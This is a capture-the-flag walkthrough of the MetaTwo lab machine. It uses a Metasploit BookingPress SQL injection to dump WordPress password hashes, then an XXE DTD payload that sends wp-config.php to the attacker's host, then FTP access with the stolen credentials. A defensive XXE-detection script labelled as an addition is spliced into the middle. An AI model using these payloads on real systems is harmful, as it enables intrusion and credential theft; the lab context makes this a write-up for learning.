Foothold

msf6 > use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > options

Module options (auxiliary/gather/wp_bookingpress_category_services_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:h
                                         ost:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploi
                                         t.com/docs/using-metasploit/basics/using-metas
                                         ploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /bookingpress/   yes       The URL of the BookingPress appointment bookin
                                         g page
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts 10.10.11.186
rhosts => 10.10.11.186
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set vhost metapress.htb
vhost => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set targeturi events
targeturi => events
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.10.11.186
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username  Email                  Hash
 --------  -----                  ----
 admin     [email protected]    $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
 manager   [email protected]  $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

[*] Auxiliary module execution completed
manager:partylikearockstar
adot@pwndot:~/htb/metatwo$ cat xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.18:8000/?p=%file;'>" >
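As an added defender-side illustration, not part of the original writeup: a small Python triage check that flags DTD content carrying the external parameter-entity and php://filter indicators seen in the payload above (the kind of file-upload or proxy inspection that would catch this exfiltration pattern). The two sample strings and the EXAMPLE-HOST placeholder are constructed for the example.

```python
import re

# Constructed sample modelled on the parameter-entity DTD shown above (not the
# page's own file): an external parameter entity reads a local file through
# php://filter, and a nested entity ships the result to a remote host.
SUSPICIOUS_DTD = (
    '<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode'
    '/resource=../wp-config.php">\n'
    '<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'http://EXAMPLE-HOST/?p=%file;\'>" >\n'
)

# Constructed benign DTD: a single internal entity, no external references.
BENIGN_DTD = '<!ENTITY company "Example Corp">\n'

# Each rule is (name, regex). Patterns are deliberately loose: this is triage
# logic for flagging files for review, not an XML parser.
RULES = [
    ("external_entity", re.compile(r"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.I)),
    ("parameter_entity", re.compile(r"<!ENTITY\s+(%|&#x25;|&#37;)\s*\w+", re.I)),
    ("php_filter_wrapper", re.compile(r"php://filter/", re.I)),
    ("entity_in_entity", re.compile(r"<!ENTITY[^>]*(&lt;|<)!ENTITY", re.I)),
    ("external_url", re.compile(r"\b(https?|ftp)://", re.I)),
]


def xxe_indicators(text: str) -> list[str]:
    """Return the names of all rules that match, in RULES order."""
    return [name for name, rx in RULES if rx.search(text)]


def is_suspicious(text: str) -> bool:
    """Flag content that declares an external entity plus at least one
    further exfiltration-style indicator, so a plain internal entity
    declaration does not trip the check."""
    hits = set(xxe_indicators(text))
    return "external_entity" in hits and len(hits) >= 2


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_DTD), ("benign", BENIGN_DTD)):
        print(label, is_suspicious(sample), xxe_indicators(sample))
```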
adot@pwndot:~/htb/metatwo/CVE-2021-29447/attacker/www$ mv evil.dtd evil1.dtd

adot@pwndot:~/htb/metatwo/CVE-2021-29447/attacker/www$ mv ../xx3.dtd ./evil.dtd

adot@pwndot:~/htb/metatwo/CVE-2021-29447$ make up-mal
php -S 0.0.0.0:8001 -t attacker/www/
[Mon Feb 24 19:27:50 2025] PHP 8.2.27 Development Server (http://0.0.0.0:8001) started
metapress.htb:9NYS_ii@FyL_p5M2NvJ
blog:635Aq@TdqrCwXFUZ
adot@pwndot:~/htb/metatwo$ ftp 10.10.11.186
Connected to 10.10.11.186.
220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
Name (10.10.11.186:adot): metapress.htb
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||17084|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer
226 Transfer complete
ftp> cd mailer
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||62785|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 metapress.htb metapress.htb     4096 Oct  5  2022 PHPMailer
-rw-r--r--   1 metapress.htb metapress.htb     1126 Jun 22  2022 send_email.php
226 Transfer complete
ftp> get send_email.php
local: send_email.php remote: send_email.php
229 Entering Extended Passive Mode (|||22924|)
150 Opening BINARY mode data connection for send_email.php (1126 bytes)
100% |*******************************************************************|  1126        1.32 MiB/s    00:00 ETA
226 Transfer complete
1126 bytes received in 00:00 (24.10 KiB/s)
[email protected]:Cb4_JmWM8zUZWMu@Ys